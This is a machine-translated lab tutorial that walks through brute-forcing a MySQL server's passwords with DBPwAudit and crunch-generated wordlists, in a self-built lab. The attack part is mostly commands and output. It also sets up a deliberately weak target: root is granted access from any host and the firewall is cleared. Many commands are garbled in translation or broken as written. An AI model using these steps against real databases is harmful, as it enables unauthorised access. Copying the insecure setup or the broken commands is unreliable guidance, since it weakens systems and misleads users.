1. Common Database types include SQLServer, MySql, IBM DB2, and Oracle.
2. DBPwAudit database password cracking tool
1) function: Performs brute force password cracking on the target database by attaching a dictionary. Currently, the supported databases include SQLServer, MySQL, Oracle, and DB2.
2) install DBPwAudit:
Figure 1. Upload the software package used in the experiment
Note: # crunch password dictionary generation tool
# Driver required by mysql-cennector-java password cracking tool (Note: different database types and different drivers)
# Dbpwaudit database password cracking main program
Figure 2. decompress the dbpwaudit package
[Root @ attack ~] # Unzip dbpwaudit_0_8.zip
3) Database Password dbpwaudit format
Note: first copy the *. jar driver to the/root/DBPwAudit/jdbc directory.
DBPwAudit-s <server>-d <db>-D <driver>-U <users>-P <passwords> [options]
-S-Server name or address. # specify the database IP address
-P-Port of database server/instance. # specify the database server Port
-D-Database/Instancename to audit. # specify the Database Name
-D-Thealiasof the driver to use (-Lforaliases) # specify the database type (Oracle, MySQL, MSSql, DB2)
-U-File containing usernames to guess. # user dictionary File
-P-File containing passwords to guess. # password dictionary File
-L-List driver aliases. # List the supported database driver aliases
-L
Oracle-oracle. jdbc. driver. OracleDriver
MySQL-com. mysql. jdbc. Driver
MSSql-com. microsoft. sqlserver. jdbc. SQLServerDriver
DB2-com. ibm. db2.jcc. DB2Driver
4) method 1. Crack the SQL Server database
#./Dbpwaudit. sh-s IP-d master (Database Name)-D mssql (Database Type)-U username (dictionary)-P password (dictionary)
Method 2: crack the MySql database
#./Dbpwaudit. sh-s IP-d mysql (Database Name)-D MySQL (Database Type)-U username (dictionary)-P password (dictionary)
Note: The driver must be manually imported. Create your own dictionary
5) decompress the mysql database driver package
[Root @ attack ~] # Tar-zxvf mysql-connector-java-5.1.24.tar.gz
6) manually copy the *. jar driver to the "jdbc" directory.
[Root @ attack ~] # Cp mysql-connector-java-5.1.24/mysql-connector-java-5.1.24-bin.jar DBPwAudit/jdbc/
3. Generate a password dictionary file using crunch
1) usage of crunch: dictionary generation tool
2) tool features:
· Generate dictionary files by means of permutation and combination
· The generation process can be interrupted by the number of rows or file size
· Supports generating dictionary files that combine numbers and symbols
· Supports case-sensitive letters
· Add a status report when multiple files are generated
3), tools more information and download: http://sourceforge.net/projects/crunch-wordlist/files/
4) Installation of the crunch Tool
Figure 1. decompress the crunch compressed package
[Root @ attack ~] # Tar-xvf crunch-3.4.tgz
Figure 2. make Compilation
[Root @ attack ~] # Cdcrunch-3.4
[Root @ localhost crunch-3.4] # make
Building binary...
/Usr/bin/gcc-pthread-Wall-pedantic-std = c99 crunch. c-lm-o crunch
Figure 3 install
[Root @ localhost crunch-3.4] # make install
5) use the crunch format
Directory:/pentest/passwords/crunch/
Usage 1: #./The possibility of the maximum number of digits in the shortest number of passwords-o generate a password dictionary
#./Crunch 5 5 1234567890-o pass1.dic
Usage 2: #./crunch the maximum number of digits in the shortest charset. lst (policy set)-o generate password dictionary
#./Crunch 6 8 charset. lst mixalpha-numeric-all-space-o pass2.dic
6) generate a password dictionary
[Root @ attack crunch-3.4] #/pentest/passwords/crunch 8 8 charset. lst lalpha-o pass2.dic
Note: In this experiment, the contents of the password dictionary file are manually generated by us, because the number of lines of the dictionary files with 8-bit length and all-lowercase characters is greater than 10 million lines. The required memory and other resources are many. A memory overflow error is reported when DBPwatdit is used for cracking.
[Root @ attack crunch-3.4] # cat <EOF> ~ /Crunch-3.4/pass2.dic # (manually generate the password file)
> 123456
> 654321
> 111111
> 666666
> Password
> Toor
> Root
> Admin
> Guest
> EOF
7) generate account dictionary files
[Root @ attack crunch-3.4] # vi pass1.dic
4. Install the target mysql database and set the password (192.168.1.21)
1) install and start the mysql Service
[Root @ mysql ~] # Netstat-tunapl | grep mysql
[Root @ mysql ~] # Yum install-y mysql-server mysql
[Root @ mysql ~] # Service mysqld start
Initialize the MySQL database: Installing MySQL system tables...
Starting mysqld: [OK]
[Root @ mysql ~] # Chkconfig mysqld on
[Root @ mysql ~] # Netstat-tunapl | grep mysql
Tcp 0 0 0.0.0.0: 3306 0.0.0.0: * LISTEN 2663/mysqld
2) set the administrator password for mysql
[Root @ mysql ~] # Mysqladmin-u root password "password"
[Root @ mysql ~] # Mysql-u root-p
Enter password:
Welcome to the MySQL monitor. Commands end with; or \ g.
Your MySQL connection id is 5
Server version: 5.1.67 Source distribution
Copyright (c) 2000,201 2, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
Affiliates. Other names may be trademarks of their respective
Owners.
Type 'help; 'or' \ H' for help. type' \ C' to clear the current input statement.
Mysql> exit
Bye
3) authorize Remote Login
[Root @ mysql ~] # Mysql-u root-p
Enter password:
Mysql> grant all on *. * to 'root' @ '%' identified by "password ";
Query OK, 0 rows affected (0.00 sec)
Mysql> flush privileges;
Query OK, 0 rows affected (0.00 sec)
Mysql> exit
Bye
4) Firewall iptables settings (Here we clear the firewall)
[Root @ mysql ~] # Iptables-L
Chain INPUT (policy ACCEPT)
Target prot opt source destination
Chain FORWARD (policy ACCEPT)
Target prot opt source destination
Chain OUTPUT (policy ACCEPT)
Target prot opt source destination
5) add Port 3306 to the Security Group on the cloudstack Management page.
5. mysql database password cracking
1) try to crack the Database Password
[Root @ attack ~] # Cd ~ /DBPwAudit/
[Root @ attack DBPwAudit] #. /dbpwaudit. sh-s 192.168.1.21-d mysql-D MySQL-U .. /crunch-3.4/pass1.dic-P .. /crunch-3.4/pass2.dic
---------------------------------------------------
2) Results After cracking
3) Verification
[Root @ attack DBPwAudit] # mysql-u root-h 192.168.1.21-p
Enter password:
---------- Mysql database password cracking is now complete